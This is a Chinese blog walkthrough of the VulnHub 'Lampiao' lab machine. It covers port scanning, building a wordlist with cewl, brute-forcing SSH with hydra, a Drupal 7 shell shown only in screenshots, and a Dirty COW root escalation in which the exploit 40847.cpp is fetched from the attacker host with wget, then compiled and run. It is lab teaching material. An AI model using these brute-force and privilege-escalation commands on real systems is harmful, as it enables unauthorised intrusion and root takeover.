[VulnHub靶机]Lampiao_脏牛提权

环境介绍

攻击机:kali(192.168.56.104)
受害机:lampiao(192.168.56.107)

实验步骤

1. 扫描端口

nmap -sS -Pn -A -p- -n 192.168.56.107

开放了22、80、1898端口
在这里插入图片描述
在这里插入图片描述

2. 信息收集

80端口没什么东西,我们访问1898端口,还是先扫描一下1898端口下的目录:

在这里插入图片描述
在这里插入图片描述
这些文件等会再看,1898端口:

在这里插入图片描述

经过测试并不能注册用户,需要通过邮箱验证码才能设置密码,所以行不通.

查看博客的详情页面:
下图是第一篇:

在这里插入图片描述
第二篇:
在这里插入图片描述

中间少了一个?q=node/2

在这里插入图片描述

发现了一张图片和一段音频:
在这里插入图片描述
扫描图片没什么有用的信息

音频的内容是:user tigao

3. ssh爆破

这里要用到一个kali下的工具:cewl
添加目标的一些基本信息,用于生成密码字典

cewl http://192.168.56.107:1898/?q=node/1 -w dict.txt

指定用户名tigao,进行hydra爆破:

hydra -l tiago -P dict.txt -vV -t4 192.168.56.107 ssh

在这里插入图片描述

密码:Virgulino

ssh连接:

在这里插入图片描述

4. drupal 7 漏洞getshell

在这里插入图片描述

百度可以搜到cve编号
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

5. 脏牛提权

第二天的时候靶机无法启动了,搞了搞

靶机:192.168.137.134
kali:192.168.137.128

Dirty COW,CVE-2016-5195,攻击者可利用该漏洞本地以低权限提升到root权限。Dirty COW 是一个特权升级漏洞,可以在每个Linux发行版中找到。这个漏洞的特别之处在于,防病毒和安全软件无法检测,一旦被利用,根本无从知晓。

漏洞在全版本Linux系统(Linux kernel >= 2.6.22)均可以实现提权
如果内核版本低于列表里的版本,表示还存在脏牛漏洞
Centos7 /RHEL7    3.10.0-327.36.3.el7
Cetnos6/RHEL6     2.6.32-642.6.2.el6
Ubuntu 16.10         4.8.0-26.28
Ubuntu 16.04         4.4.0-45.66
Ubuntu 14.04         3.13.0-100.147
Debian 8                3.16.36-1+deb8u2
Debian 7                3.2.82-1

在这里插入图片描述

查看文件具体所在路径:

locate linux/local/40847.cpp

在这里插入图片描述

开启http服务,通过wget下载我们kali下的40847.cpp

python -m SimpleHTTPServer 8000
wget http://192.168.137.128:8000/40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
ls -al
./40847

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
最终得到

root的密码为dirtyCowFun

拿到root权限
在这里插入图片描述

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值